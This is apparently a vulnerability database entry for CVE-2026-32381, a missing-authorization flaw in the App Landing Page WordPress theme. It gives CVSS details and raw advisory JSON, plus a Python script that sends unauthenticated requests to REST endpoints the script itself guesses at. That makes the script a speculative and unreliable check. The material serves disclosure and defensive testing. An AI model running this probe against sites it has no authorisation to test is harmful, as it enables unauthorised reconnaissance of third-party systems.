Security Vulnerability Report
中文
CVE-2026-32381 CVSS 5.3 MEDIUM

CVE-2026-32381

Published: 2026-03-13 19:54:53
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in raratheme App Landing Page app-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects App Landing Page: from n/a through <= 1.2.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

App Landing Page theme <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32381 PoC - Missing Authorization in App Landing Page theme # Target: WordPress site with App Landing Page theme <= 1.2.2 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-32381 This checks for missing authorization in theme endpoints """ # Common theme endpoints that might be affected endpoints = [ '/wp-json/app-landing-page/v1/settings', '/wp-json/app-landing-page/v1/contact', '/wp-json/app-landing-page/v1/subscribe', '/?rest_route=/app-landing-page/v1/settings', '/?rest_route=/app-landing-page/v1/contact' ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: CVE-2026-32381 - Missing Authorization") print(f"[*] Affected Product: App Landing Page theme <= 1.2.2") print("-" * 60) vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) print(f"\n[>] Testing: {endpoint}") print(f" Status: {response.status_code}") # Check if response indicates unauthorized access is possible if response.status_code == 200: # Check if sensitive data is exposed if 'settings' in endpoint or 'config' in endpoint: print(f" [!] VULNERABLE - Settings endpoint accessible without auth") print(f" Response preview: {response.text[:200]}...") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f" [+] Protected (expected)") else: print(f" [*] Unexpected status code") except requests.exceptions.RequestException as e: print(f" [!] Request failed: {e}") print("\n" + "=" * 60) if vulnerable: print("[!] Target appears to be VULNERABLE to CVE-2026-32381") print("[!] App Landing Page theme allows unauthorized access") return True else: print("[*] No obvious vulnerability detected") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-32381-poc.py <target_url>") print("Example: python cve-2026-32381-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32381", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:53.160", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in raratheme App Landing Page app-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects App Landing Page: from n/a through <= 1.2.2."}, {"lang": "es", "value": "Vulnerabilidad por ausencia de autorización en raratheme App Landing Page app-landing-page permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a App Landing Page: desde n/a hasta &lt;= 1.2.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/app-landing-page/vulnerability/wordpress-app-landing-page-theme-1-2-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}